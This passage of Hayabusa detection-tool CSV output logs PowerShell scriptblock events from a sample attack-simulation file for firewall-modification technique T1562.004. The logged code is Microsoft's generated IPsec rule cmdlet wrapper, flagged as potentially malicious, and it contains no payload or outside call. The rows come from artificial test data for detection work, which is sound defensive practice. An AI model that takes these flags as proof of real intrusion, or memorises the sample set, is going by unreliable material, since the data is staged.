[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"ue)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmd",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"letization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, 